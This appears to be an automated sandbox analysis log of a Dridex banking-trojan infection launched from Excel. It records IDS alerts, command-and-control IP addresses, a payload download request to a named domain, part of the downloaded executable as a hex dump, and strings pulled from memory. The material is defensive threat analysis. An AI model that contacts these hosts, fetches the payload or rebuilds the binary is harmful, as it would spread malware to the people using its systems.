Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49263
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49262
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49268
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49275
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49277
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49279
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49282
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49284
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49286
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49290
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49298
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49300
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49306
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49318
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49317
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49320
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49321
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49322
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49325
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 69.164.207.140:3388
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.57.200.100:3786
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Jan 2021 15:03:27 GMTServer: ApacheLast-Modified: Sat, 19 May 2018 08:09:45 GMTAccept-Ranges: bytesContent-Length: 856064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2b f5 15 8c 6f 94 7b df 6f 94 7b df 6f 94 7b df 0a f2 78 de 62 94 7b df 0a f2 7e de e4 94 7b df 0a f2 7f de 78 94 7b df a4 fb 7e de 4d 94 7b df a4 fb 7f de 7f 94 7b df a4 fb 78 de 79 94 7b df db 08 94 df 6a 94 7b df 6f 94 7a df 3b 94 7b df a4 fb 72 de 6e 94 7b df a4 fb 7b de 6e 94 7b df a4 fb 84 df 6e 94 7b df a4 fb 79 de 6e 94 7b df 52 69 63 68 6f 94 7b df 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 df 94 d5 5d 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 74 07 00 00 e4 06 00 00 00 00 00 08 d2 05 00 00 10 00 00 00 90 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 0e 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 df 0c 00 64 00 00 00 34 e0 0c 00 50 00 00 00 00 50 0e 00 08 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 08 27 00 00 7c bb 0c 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 bb 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 72 07 00 00 10 00 00 00 74 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 58 05 00 00 90 07 00 00 5a 05 00 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 5b 01 00 00 f0 0c 00 00 10 00 00 00 d2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 05 00 00 00 50 0e 00 00 06 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 27 00 00 00 60 0e 00 00 28 00 00 00 e8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox ViewIP Address: 69.164.207.140 69.164.207.140
Source: Joe Sandbox ViewIP Address: 211.110.44.63 211.110.44.63
Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /hknmwj.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stellarum.com.brConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /hknmwj.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stellarum.com.brConnection: Keep-Alive
Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comF equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: qsf.surfescape.net
Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmpString found in binary or memory: http://crl.co
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabEK
Source: regsvr32.exe, 00000011.00000002.2492560886.000000000053C000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabb
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enL
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
